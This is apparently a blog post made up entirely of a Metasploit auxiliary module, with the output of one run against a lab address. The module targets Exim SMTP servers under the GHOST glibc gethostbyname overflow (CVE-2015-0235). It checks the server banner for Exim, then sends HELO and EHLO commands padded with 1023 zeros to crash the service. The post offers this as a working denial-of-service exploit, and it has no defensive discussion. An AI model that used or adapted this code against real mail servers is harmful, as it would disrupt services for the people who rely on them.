msf auxiliary(ghost-exim-smtp-dos) > run
[*] 192.168.1.132:25 - Server: ESMTP Exim 4.20
[*] 192.168.1.132:25 - HELO: ESMTP Exim 4.20
[-] Auxiliary failed: EOFError EOFError
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/rex/io/stream.rb:203:in `get_once'
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/smtp.rb:68:in `raw_send_recv'
[-] /usr/share/metasploit-framework/modules/exploits/linux/smtp/ghost-exim-smtp-dos.rb:44:in `run'
[*] Auxiliary module execution completed
msf auxiliary(ghost-exim-smtp-dos) >
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Smtp
include Msf::Auxiliary::Dos
def initialize
super(
'Name' => 'Exim ESMTP glibc gethostbyname() Buffer Overflow CVE-2015-0235',
'Description' => %q{
This module exploits a buffer overflow in Exim SMTP servers version 4.20 or less resulting in a service crash on vulnerable systems.
},
'Author' => [ '1N3' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $'
)
end
def run()
connect
print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")
if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Exim /
disconnect
fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Exim!")
end
buffer = "0" * 1023
helo_resp = raw_send_recv("HELO " + buffer + "\r\n")
helo_resp.each_line do |line|
print_status("#{rhost}:#{rport} - HELO: #{line.strip}")
end
ehlo_resp = raw_send_recv("EHLO " + buffer + "\r\n")
ehlo_resp.each_line do |line|
print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
end
print_status("Exploit sent!")
disconnect()
end
end
No comments:
Post a Comment